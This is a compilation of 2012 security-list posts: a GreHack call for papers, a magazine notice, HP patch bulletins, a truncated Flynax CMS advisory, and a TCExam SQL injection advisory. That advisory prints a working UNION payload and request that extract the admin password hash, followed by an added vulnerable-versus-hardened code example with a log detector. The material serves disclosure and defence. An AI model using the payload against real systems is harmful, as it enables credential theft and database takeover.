GreHack 2012 - LAST Call For Papers (Grenoble, France) till 15th August 2012
-- GreHack 2012 LAST Call For Papers .. till 15th August 2012 -- http://grehack.org

GreHack 2012 conference will take place in Grenoble (Alps), France on October 19th-20th 2012 and brings together students, academia, industry and government to exchange knowledge around emerging issues in the security + hacking world. During the night, a Capture The Flag will take place. Each paper is peer reviewed at least 3 times.

*Suggested Topics (not limited to)*
http://grehack.org/en/index.php/GreHack_2012-Call_For_Papers-english/

- Track: ethical, legal and philosophical
  -- greyhat hacking: a consumer advance, or a risk for worldwide security?
  -- current state of laws relative to cyber-security and hacking + justified suggestions of modifications

- Track: technical
  -- Hadopi: why is it a technical and legal failure? how to exploit in memory vulnerabilities of Hadopi approved software?
  -- In Memory Vulnerabilities
    --- Windows 8: heap analysis, kernel structures and new memory protections
    --- Exploit Corner: come present us your last sploit!
  -- Hardcore Penetration Testing
    --- Code obfuscation to complicate Reverse Engineering
    --- Discrete Attacks (eg: without writing on the filesystem)
    --- Hypervisor evasion
    --- Vulnerabilities and exploits on defensive security tools (eg: AntiMalwares, Firewalls, IDS)
  -- Attacking Infrastructures
    --- Internet: how to root your ***box? Which security functionalities (and properties) are provided? How to bypass them?
    --- ipsec, ipv6
    --- routing protocols
    --- wireless: 802.11, 3G and 4G networks, WiMAX, RFID
    --- sensor networks
  -- Malwares and Botnets
    --- state of the art of botnets redundancy mechanism
    --- self-code modification (polymorphism) of malwares
    --- ability of antimalwares to detect slightly mutated samples
    --- vulnerabilities in antimalwares drivers

- Track: research
  -- Learning and Offensive Security
    --- static and dynamic analysis
    --- dumb/simple/basic fuzzing and smart-fuzzing for automating vulnerability detection
    --- metrics for exploitability of vulns (in memory, web)
    --- model checking
    --- advances in reverse-engineering automation and model inference
    --- concolic execution
  -- Hardware Attacks
    --- nanotechnology
    --- fault injection in memory via laser
    --- smart cards
    --- transportations
    --- medical tools
    --- embedded malwares
  -- Cryptology
    --- influence of the environment on PRNG entropy
    --- mathematic aspects in current cryptology
  -- Defensive Security
    --- Trust Based Computing
    --- New Access Control Models for processes isolation
    --- New H/W + S/W for increasing the cost of exploitation

*Remark*
- We highly encourage original topics that break with traditional research directions
- We will favor presentations with tools demonstrations or results

*Important Dates*
- CFP Opens: 1st May 2012
- CFP Closing Date: EXTENDED to 15th August 2012 (due to several requests; was initially 15th July 2012)
- Final speakers List online: 09 September 2012
- Conference Dates: 19 October 2012 9am-7pm
- Capture The Flag: night (19 October 2012 9pm till 20 October 2012 6am Paris time :)

*Program Committee*
- Dan Alloun (Intel)
- Florent Autreau (Mataru)
- Claude Castelluccia (INRIA)
- Fabien Duchene (LIG)
- Philippe Elbaz-Vincent (UJF)
- Karim Hossen (LIG)
- Pascal Lafoucarde (VERIMAG)
- Arnaud Maillet (Evidian RD, Ensimag student)
- Pascal Malterre (CEA)
- Sanjay Rawat (LIG)
- Guillaume Touron (Ensimag student)
- Marie-Laure Potet (VERIMAG)
- anonymous researcher (private company in vulnerability research)

*Invited Talks*
- Eric Freyssinet (LIP6, Gendarmerie): Botnet: From Observation to Investigation
- Christophe Devine (ANSSI): mobile telephony security: a compared study. till what degree can we trust mobile operating systems and radio protocols?
- Philippe Elbaz-Vincent (UJF): attacks on randomness of hardware Prime Random Number Generator
- Regis Leveugle (TIMA): attacks on secure hardware
- Kostya Kortchinsky (Microsoft and formerly Immunity Inc.): TBA

*Speaker Benefits*
- Free pass to the conference
- Accommodation during the Conference (1 night)
- GreHack will participate to travel expenses (limited budget)

*Submission Guidelines*
Call for Papers is open till 15th August 2012. Consider submitting even if your topic is not listed above.
http://grehack.org/index.php/GreHack_2012-Call_For_Papers-english
send your submission to: grehack-program_committee _A_T_ car-online.fr

*Capture The Flag*
http://grehack.org/index.php/GreHack-2012-Capture_The_Flag_rules-english
[Announcement] ClubHack Magazine's Aug 2012 Issue Released
Hello Readers,

ClubHack Magazine's Issue 31 - August 2012 is here. This issue covers the following articles:

0x00 Tech Gyan - Malware Memory Forensics
0x01 Tool Gyan - Tamper Data
0x02 Mom's Guide - Apple iOS vulnerabilities
0x03 Legal Gyan - VARIOUS AUTHORITIES UNDER THE IT ACT
0x04 Matriux Vibhag - Matriux Ec-Centric
0x05 Poster - Security by luck, not possible

The PDF version can be downloaded from: http://www.chmag.in/issue/aug2012.pdf
Check http://chmag.in/ for all the articles.

Articles, feedback and suggestions are welcome. Please send your bouquets or brickbats to i...@chmag.in

--
Regards,
Team CHMag
http://chmag.in
TCExam Edit SQL Injection
TCExam Edit SQL Injection

Summary
=======
TCExam 11.3.007 is prone to a SQL injection flaw located in tce_edit_answer.php and tce_edit_question.php. These files pass a 'subject_module_id' parameter into a SQL statement without satisfactory sanitisation. An attacker with authoring permissions could leverage this vulnerability to take full control of the database.

CVE number: CVE-2012-4237
Impact: High
Vendor homepage: http://www.tcexam.org/
Vendor notified: 06/08/2012
Vendor fixed: 06/08/2012
Credit: Chris Cooper of Reaction Information Security (http://www.reactionis.co.uk/)
This advisory is posted at: http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html

Affected Products
=================
Confirmed in TCExam 11.3.007. Prior versions may also be affected.

Details
=======
The 'subject_module_id' parameters in the tce_edit_answer.php and tce_edit_question.php pages were found to be subject to a SQL injection vulnerability. It was possible to inject arbitrary SQL statements into a WHERE clause, retrieving information from the database via the page output. The attacker must be authenticated as a valid user with a permission level of 5 or above in order for the attack to be successful.

The following payload will extract the admin password hash (some characters may need to be URL encoded):

99.9 union all select (select concat(0x7e,0x27,tce_users.user_password,0x27,0x7e) from `tcexam`.tce_users where tce_users.user_name = CHAR(97,100,109,105,110) limit 0,1) ,0x0,0x0,0x0,0x0,0x0--

Example Request:

GET /TCExam/admin/code/tce_edit_answer.php?subject_module_id=99.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ctce_users.user_password%2C0x27%2C0x7e%29+from+%60tcexam%60.tce_users+where+tce_users.user_name+%3d+CHAR(97,100,109,105,110)+limit+0%2C1%29+%2C0x0%2C0x0%2C0x0%2C0x0%2C0x0--&question_subject_id=3&answer_question_id=7 HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php
Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df

Example Response:

--- SNIP ---
<select name="question_subject_id" id="question_subject_id" size="0" onchange="document.getElementById('form_answereditor').changesubject.value=1; document.getElementById('form_answereditor').submit();" title="test topic">
<option value="~'c574b5b09ab10f4f39ae9dce6d539cf0'~">1. - [%00]</option>
</select>
--- SNIP ---

Impact
======
An authenticated user with a permission level of 5 or higher could take full control of the database, essentially allowing them to escalate their privileges by either directly controlling the database, cracking an administrator password or potentially changing their own permission level. Furthermore, an attacker might be able to leverage this vulnerability in order to further compromise the host machine.

Solution
========
Upgrade to TCExam 11.3.008.

Distribution
============
In addition to posting on the website, a text version of this notice has been posted to the following e-mail and Usenet news recipients.
* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS corporate website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the URL below for any updates:
http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html

--
Reaction Information Security
Lombard House Business Centre, Suite 117, 12-17 Upper Bridge Street, Canterbury, Kent, CT1 2NF
Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
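The advisory above describes a numeric request parameter spliced straight into a WHERE clause. As an added illustration, not part of the advisory or of TCExam's code, the block below puts that vulnerable pattern beside a hardened handler (strict integer validation plus a bound parameter) and a small retrospective check that flags non-numeric subject_module_id values in access logs; the sqlite3 schema, table and column names, sample rows and log lines are constructed stand-ins, not TCExam's real schema.

```python
"""Vulnerable vs. hardened handling of a numeric id such as subject_module_id,
plus a log check. Added example; schema, data and log lines are constructed."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# A module id is a short run of ASCII digits and nothing else.
ID_RE = re.compile(r"[0-9]{1,10}")


def make_db():
    """In-memory stand-in for the two tables the advisory's payload touches
    (table/column names and values are assumptions made for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tce_modules (module_id INTEGER, module_name TEXT)")
    conn.execute("CREATE TABLE tce_users (user_name TEXT, user_password TEXT)")
    conn.executemany("INSERT INTO tce_modules VALUES (?, ?)",
                     [(1, "Algebra"), (2, "Geometry")])
    conn.execute("INSERT INTO tce_users VALUES (?, ?)",
                 ("admin", "constructed-hash-0000"))
    conn.commit()
    return conn


def modules_unsafe(conn, subject_module_id):
    """Vulnerable pattern: the raw parameter becomes part of the SQL text, so a
    UNION inside the value is executed as SQL and reads from other tables."""
    sql = ("SELECT module_id, module_name FROM tce_modules "
           "WHERE module_id = " + subject_module_id)
    return conn.execute(sql).fetchall()


def parse_module_id(raw):
    """Allow-list validation: accept a plain integer, reject everything else."""
    if not ID_RE.fullmatch(raw):
        raise ValueError("subject_module_id must be a positive integer")
    return int(raw)


def modules_safe(conn, subject_module_id):
    """Hardened pattern: the validated value is bound as a parameter, so the
    SQL text never changes with user input."""
    mid = parse_module_id(subject_module_id)
    return conn.execute(
        "SELECT module_id, module_name FROM tce_modules WHERE module_id = ?",
        (mid,)).fetchall()


# Constructed value with the same shape as the advisory's payload: a numeric
# prefix followed by a UNION that pulls a row from another table.
UNION_VALUE = ("99.9 union all select user_password, 0 "
               "from tce_users where user_name = 'admin'")


def flag_suspicious_ids(log_lines, param="subject_module_id"):
    """Return (line_no, decoded_value) for each access-log line whose value of
    `param` is not a plain integer: a cheap check for past abuse of this bug."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        for value in query.get(param, []):
            if not ID_RE.fullmatch(value):
                hits.append((n, value))
    return hits


# Constructed access-log lines: one normal edit request, one carrying a UNION.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Aug/2012:10:00:01 +0100] "GET /TCExam/admin/code/'
    'tce_edit_answer.php?subject_module_id=3&question_subject_id=3 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [06/Aug/2012:10:00:09 +0100] "GET /TCExam/admin/code/'
    'tce_edit_answer.php?subject_module_id=99.9+union+all+select+1%2C2--'
    '&question_subject_id=3 HTTP/1.1" 200 5211',
]

if __name__ == "__main__":
    db = make_db()
    print("unsafe query returned:", modules_unsafe(db, UNION_VALUE))
    try:
        modules_safe(db, UNION_VALUE)
    except ValueError as exc:
        print("safe handler rejected input:", exc)
    print("flagged log lines:", flag_suspicious_ids(SAMPLE_LOG))
```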
[security bulletin] HPSBMU02801 SSRT100879 rev.1 - HP Fortify Software Security Center, Remote Unauthenticated Disclosure of Information
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03447824

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447824
Version: 1

HPSBMU02801 SSRT100879 rev.1 - HP Fortify Software Security Center, Remote Unauthenticated Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote unauthenticated disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Fortify Software Security Center. The vulnerability could be remotely exploited to allow unauthenticated disclosure of information.

References: CVE-2012-3248, FLC01

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5 running on Windows, Linux and Solaris

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2012-3248    (AV:N/AC:L/Au:N/C:P/I:N/A:N)       5.0
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Luca Carettoni for reporting this issue to security-al...@hp.com

RESOLUTION
HP has provided patches for HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5. This issue is resolved in v3.60 and greater. Contact HP Fortify support at fortifytechsupp...@hp.com to receive instructions on how to download the patches.

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
[security bulletin] HPSBMU02802 SSRT100923 rev.1 - HP Fortify Software Security Center, Remote Disclosure of Privileged Information
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03447895

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447895
Version: 1

HPSBMU02802 SSRT100923 rev.1 - HP Fortify Software Security Center, Remote Disclosure of Privileged Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote disclosure of privileged information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Fortify Software Security Center. The vulnerability could be remotely exploited to allow disclosure of privileged information.

References: CVE-2012-3249, FLC02

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5 running on Windows, Linux and Solaris

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2012-3249    (AV:N/AC:M/Au:S/C:P/I:N/A:N)       3.5
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Luca Carettoni for reporting this issue to security-al...@hp.com

RESOLUTION
HP has provided patches for HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5. This issue is resolved in v3.60 and greater. Contact HP Fortify support at fortifytechsupp...@hp.com to receive instructions on how to download the patches.

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release
[security bulletin] HPSBMU02800 SSRT100921 rev.1 - HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS)
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03447828

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447828
Version: 1

HPSBMU02800 SSRT100921 rev.1 - HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Service Manager and HP Service Center Server. The vulnerability could be remotely exploited resulting in a Denial of Service (DoS).

References: CVE-2012-3250

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Service Manager Server 9.30, 9.21, and 7.11.
HP Service Center Server 6.28.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2012-3250    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has provided the following patch kits available to resolve these vulnerabilities.

HP Product Versions / Platform / Patch Kit / URL

SM9.30P4 Server
- Windows, Server 9.30.274 p4:
  http://support.openview.hp.com/selfsolve/document/KM1415197?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415197&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- HP Itanium, Server 9.30.274 p4:
  http://support.openview.hp.com/selfsolve/document/KM1415199?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415199&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- Linux, Server 9.30.274 p4:
  http://support.openview.hp.com/selfsolve/document/KM1415195?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415195&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- Solaris, Server 9.30.274 p4:
  http://support.openview.hp.com/selfsolve/document/KM1415192?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415192&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- AIX, Server 9.30.274 p4:
  http://support.openview.hp.com/selfsolve/document/KM1415201?searchIdentifier=-72890797%3a138eb464d5e%3a5d91&resultType=document&documentURL=KM1415201&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

SM9.21P5 Server
- Windows, Server 9.21.013:
  http://support.openview.hp.com/selfsolve/document/KM1036626?searchIdentifier=-72890797%3a138eb464d5e%3a6374&resultType=document&documentURL=KM1036626&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- HP Itanium, Server 9.21.290 p5:
  http://support.openview.hp.com/selfsolve/document/KM1396806?searchIdentifier=-72890797%3a138eb464d5e%3a62d5&resultType=document&documentURL=KM1396806&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- HP parisc, Server 9.21.290 p5:
  http://support.openview.hp.com/selfsolve/document/KM1396804?searchIdentifier=-72890797%3a138eb464d5e%3a6374&resultType=document&documentURL=KM1396804&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- Linux, Server 9.21.290 p5:
  http://support.openview.hp.com/selfsolve/document/KM1396802?searchIdentifier=-72890797%3a138eb464d5e%3a6374&resultType=document&documentURL=KM1396802&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- Solaris, Server 9.21.290 p5:
  http://support.openview.hp.com/selfsolve/document/KM1396801?searchIdentifier=-72890797%3a138eb464d5e%3a6374&resultType=document&documentURL=KM1396801&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- AIX, Server 9.21.290 p5:
  http://support.openview.hp.com/selfsolve/document/KM1396808?searchIdentifier=-72890797%3a138eb464d5e%3a62d5&resultType=document&documentURL=KM1396808&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

SM7.11P19 Server
- Windows, Server 7.11.532 p19:
  http://support.openview.hp.com/selfsolve/document/KM1448273?searchIdentifier=-72890797%3a138eb464d5e%3a6481&resultType=document&documentURL=KM1448273&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- HP Itanium, Server 7.11.532 p19:
  http://support.openview.hp.com/selfsolve/document/KM1448276?searchIdentifier=-72890797%3a138eb464d5e%3a6481&resultType=document&documentURL=KM1448276&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- HP parisc, Server 7.11.532 p19:
  http://support.openview.hp.com/selfsolve/document/KM1448274?searchIdentifier=-72890797%3a138eb464d5e%3a6481&resultType=document&documentURL=KM1448274&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- Linux x86, Server 7.11.532 p19:
  http://support.openview.hp.com/selfsolve/document/KM1448277?searchIdentifier
[security bulletin] HPSBMU02803 SSRT100926 rev.1 - HP Service Manager and HP Service Center Web Tier, Remote Cross Site Scripting (XSS)
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03450382

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03450382
Version: 1

HPSBMU02803 SSRT100926 rev.1 - HP Service Manager and HP Service Center Web Tier, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote cross site scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Service Manager and HP Service Center Web Tier. The vulnerability could be remotely exploited resulting in cross site scripting (XSS).

References: CVE-2012-3251

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Service Manager Web Tier 9.30, 9.21, and 7.11.
HP Service Center Web Tier 6.28.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2012-3251    (AV:N/AC:M/Au:N/C:P/I:P/A:P)       6.8
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has provided the following patch kits available to resolve these vulnerabilities.

HP Product Versions / Patch Kit URL

- SM9.30P4 Web Tier:
  http://support.openview.hp.com/selfsolve/document/KM1415193?searchIdentifier=-72890797%3a138eb464d5e%3a5a08&resultType=document&documentURL=KM1415193&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- SM9.21p5 Web Tier:
  http://support.openview.hp.com/selfsolve/document/KM1396812?searchIdentifier=-72890797%3a138eb464d5e%3a5a66&resultType=document&documentURL=KM1396812&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- SM7.11p19 Web Tier:
  http://support.openview.hp.com/selfsolve/document/KM1448272?searchIdentifier=-72890797%3a138eb464d5e%3a5957&resultType=document&documentURL=KM1448272&resultsURL=%2fselfsolve%2fpatches&allowReturn=true
- SC6.2.8.10 Web Tier:
  http://support.openview.hp.com/selfsolve/document/KM1320938?searchIdentifier=-72890797%3a138eb464d5e%3a5a86&resultType=document&documentURL=KM1320938&resultsURL=%2fselfsolve%2fpatches&allowReturn=true

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release
[security bulletin] HPSBUX02805 SSRT100919 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03441075

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03441075
Version: 1

HPSBUX02805 SSRT100919 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities.

References: CVE-2012-0508, CVE-2012-0551, CVE-2012-1711, CVE-2012-1713, CVE-2012-1716, CVE-2012-1718, CVE-2012-1719, CVE-2012-1720, CVE-2012-1721, CVE-2012-1722, CVE-2012-1723, CVE-2012-1724, CVE-2012-1725, CVE-2012-1726

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE 7.0.02 and 6.0.15

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2012-0508    (AV:N/AC:L/Au:N/C:C/I:C/A:C)      10.0
CVE-2012-0551    (AV:N/AC:M/Au:N/C:P/I:P/A:N)       5.8
CVE-2012-1711    (AV:N/AC:L/Au:N/C:P/I:P/A:P)       7.5
CVE-2012-1713    (AV:N/AC:L/Au:N/C:C/I:C/A:C)      10.0
CVE-2012-1716    (AV:N/AC:L/Au:N/C:C/I:C/A:C)      10.0
CVE-2012-1718    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0
CVE-2012-1719    (AV:N/AC:L/Au:N/C:N/I:P/A:N)       5.0
CVE-2012-1720    (AV:L/AC:H/Au:N/C:P/I:P/A:P)       3.7
CVE-2012-1721    (AV:N/AC:L/Au:N/C:C/I:C/A:C)      10.0
CVE-2012-1722    (AV:N/AC:L/Au:N/C:C/I:C/A:C)      10.0
CVE-2012-1723    (AV:N/AC:L/Au:N/C:C/I:C/A:C)      10.0
CVE-2012-1724    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0
CVE-2012-1725    (AV:N/AC:L/Au:N/C:C/I:C/A:C)      10.0
CVE-2012-1726    (AV:N/AC:L/Au:N/C:P/I:P/A:N)       6.4
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities. The upgrade is available from the following location: http://www.hp.com/go/java

HP-UX B.11.23, B.11.31 / JDK and JRE v7.0.02 or subsequent
HP-UX B.11.23, B.11.31 / JDK and JRE v6.0.15 or subsequent
HP-UX B.11.11, B.11.23 / JDK and JRE v6.0.15 or subsequent

MANUAL ACTIONS: Yes - Update
For Java v7.0 update to Java v7.0.02 or subsequent
For Java v6.0 update to Java v6.0.15 or subsequent

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.23
HP-UX B.11.31
===================
Jdk70.JDK70-COM
Jdk70.JDK70-DEMO
Jdk70.JDK70-IPF32
Jdk70.JDK70-IPF64
Jre70.JRE70-COM
Jre70.JRE70-IPF32
Jre70.JRE70-IPF32-HS
Jre70.JRE70-IPF64
Jre70.JRE70-IPF64-HS
action: install revision 1.7.0.02.00 or subsequent

HP-UX B.11.23
HP-UX B.11.31
===================
Jdk60.JDK60-COM
Jdk60.JDK60-DEMO
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.15.00 or subsequent

HP-UX B.11.11
HP-UX B.11.23
===================
Jdk60.JDK60-COM
Jdk60.JDK60-DEMO
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
action: install revision 1.6.0.15.00 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release
Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities
Title:
==
Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities

Date:
=
2012-07-13

References:
===
http://www.vulnerability-lab.com/get_content.php?id=659

VL-ID:
=
659

Common Vulnerability Scoring System:
8.3

Introduction:
=
Choosing Flynax General Classifieds software allows you to set up any classifieds website. It is not designed for a particular niche so it can be adjusted to any idea of a classifieds website. This gives you a chance to choose any niche for your classifieds website. For example you may create a classifieds website which is based on local classifieds with job ads, sport goods, motorbikes, bicycles or be oriented on all ideas in one website. Using General classifieds software with plugins you may create the classifieds website which you desire to have.

(Copy of the Vendor Homepage: http://www.flynax.com/general-classifieds-software.html )

Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Flynax General Classifieds v4.0 CMS.

Report-Timeline:
2012-07-13: Public or Non-Public Disclosure

Status:
Published

Exploitation-Technique:
===
Remote

Severity:
=
Critical

Details:
1.1
A SQL Injection vulnerability is detected in the Flynax General Classifieds v4.0 Content Management System. Remote attackers without privileged user accounts can execute/inject their own sql commands to compromise the application dbms. The vulnerability is located in the general module with the bound vulnerable sort_by parameter. Successful exploitation of the vulnerability results in dbms (Server) or application (Web) compromise. Exploitation requires no user interaction and works without a privileged user account.

Vulnerable Module(s):
[+] General

Vulnerable Parameter(s):
[+] sort_by

1.2
Multiple persistent input validation vulnerabilities are detected in the Flynax General Classifieds v4.0 Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
The persistent vulnerabilities are located in the Administrators, User Account and Categories add/list modules with the bound vulnerable titel and username parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction and a privileged user account.

Vulnerable Module(s):
[+] Common > Administrators > Add an Administrator & Listing
[+] User Accounts > Add an User Account & Listing
[+] Categories > Add a Category & Listing

Vulnerable Parameter(s):
[+] Username
[+] Titel

1.3
